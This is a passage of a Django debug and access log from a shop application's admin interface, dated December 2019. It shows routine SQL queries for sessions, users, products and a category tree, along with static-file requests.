"django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-27 06:48:54,447 utils 4252 140031492613888 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-10T06:48:54.445111+00:00'::timestamptz WHERE "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 10, 6, 48, 54, 445111, tzinfo=), '8hyn47cjuae89j7mbn5kpmybirz8ihda') [27/Dec/2019 06:48:54] "GET / HTTP/1.0" 200 8208 [27/Dec/2019 06:48:54] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [27/Dec/2019 06:48:54] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [27/Dec/2019 06:48:54] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [27/Dec/2019 06:48:54] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 DEBUG 2019-12-27 06:48:57,486 utils 4252 140031732287232 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T06:48:57.475800+00:00'::timestamptz AND "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda'); args=(datetime.datetime(2019, 12, 27, 6, 48, 57, 475800, tzinfo=), '8hyn47cjuae89j7mbn5kpmybirz8ihda') DEBUG 2019-12-27 06:48:57,489 utils 4252 140031732287232 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-27 06:48:57,495 utils 4252 140031732287232 (0.003) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-27 06:48:57,496 utils 4252 140031732287232 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-27 06:48:57,505 utils 4252 140031732287232 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-27 06:48:57,710 utils 4252 140031732287232 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-10T06:48:57.707387+00:00'::timestamptz WHERE "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 10, 6, 48, 57, 707387, tzinfo=), '8hyn47cjuae89j7mbn5kpmybirz8ihda') [27/Dec/2019 06:48:57] "GET /shop/product/ HTTP/1.0" 200 10007 [27/Dec/2019 06:48:58] "GET /static/admin/css/changelists.css HTTP/1.0" 200 6170 DEBUG 2019-12-27 06:48:58,002 utils 4252 140031732287232 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T06:48:57.994128+00:00'::timestamptz AND "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda'); args=(datetime.datetime(2019, 12, 27, 6, 48, 57, 994128, tzinfo=), '8hyn47cjuae89j7mbn5kpmybirz8ihda') DEBUG 2019-12-27 06:48:58,005 utils 4252 140031732287232 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [27/Dec/2019 06:48:58] "GET /jsi18n/ HTTP/1.0" 200 3223 [27/Dec/2019 06:48:58] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 [27/Dec/2019 06:48:58] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [27/Dec/2019 06:48:58] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [27/Dec/2019 06:48:58] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [27/Dec/2019 06:48:58] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [27/Dec/2019 06:48:58] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [27/Dec/2019 06:48:58] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [27/Dec/2019 06:48:58] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 [27/Dec/2019 06:48:58] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [27/Dec/2019 06:48:58] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [27/Dec/2019 06:49:00] "GET /static/admin/img/sorting-icons.svg HTTP/1.0" 200 1097 [27/Dec/2019 06:49:00] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 200 331 [27/Dec/2019 06:52:07] "GET / HTTP/1.0" 302 0 [27/Dec/2019 06:57:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 07:00:51,597 utils 4252 140031732287232 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T07:00:51.582738+00:00'::timestamptz AND "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda'); args=(datetime.datetime(2019, 12, 27, 7, 0, 51, 582738, tzinfo=), '8hyn47cjuae89j7mbn5kpmybirz8ihda') DEBUG 2019-12-27 07:00:51,601 utils 4252 140031732287232 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-27 07:00:51,650 utils 4252 140031732287232 (0.005) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-27 07:00:51,664 utils 4252 140031732287232 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-10T07:00:51.661827+00:00'::timestamptz WHERE "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 10, 7, 0, 51, 661827, tzinfo=), '8hyn47cjuae89j7mbn5kpmybirz8ihda') [27/Dec/2019 07:00:51] "GET / HTTP/1.0" 200 8208 DEBUG 2019-12-27 07:01:04,710 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:01:04,718 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:01:04,724 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:01:04,727 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:01:04,732 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:01:04,735 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:01:04,738 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:01:04,741 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:01:04,743 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:01:04,748 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:01:04,751 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:01:04,755 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:01:04,758 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:01:04,762 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:01:04,767 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:01:04,770 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:01:04,773 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:01:04,775 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:01:04,778 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:01:04,783 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:01:04,785 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:01:04,788 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:01:04,790 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:01:04,792 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:01:04,795 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:01:04,798 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:01:04,800 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:01:04,803 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:01:04,806 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:01:04,808 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:01:04,811 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:01:04,814 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:01:04,816 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:01:04,818 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:01:04,821 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:01:04,826 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:01:04,828 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:01:04,830 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:01:04,832 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:01:04,835 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:01:04,838 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:01:04,841 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:01:04,846 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:01:04,850 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 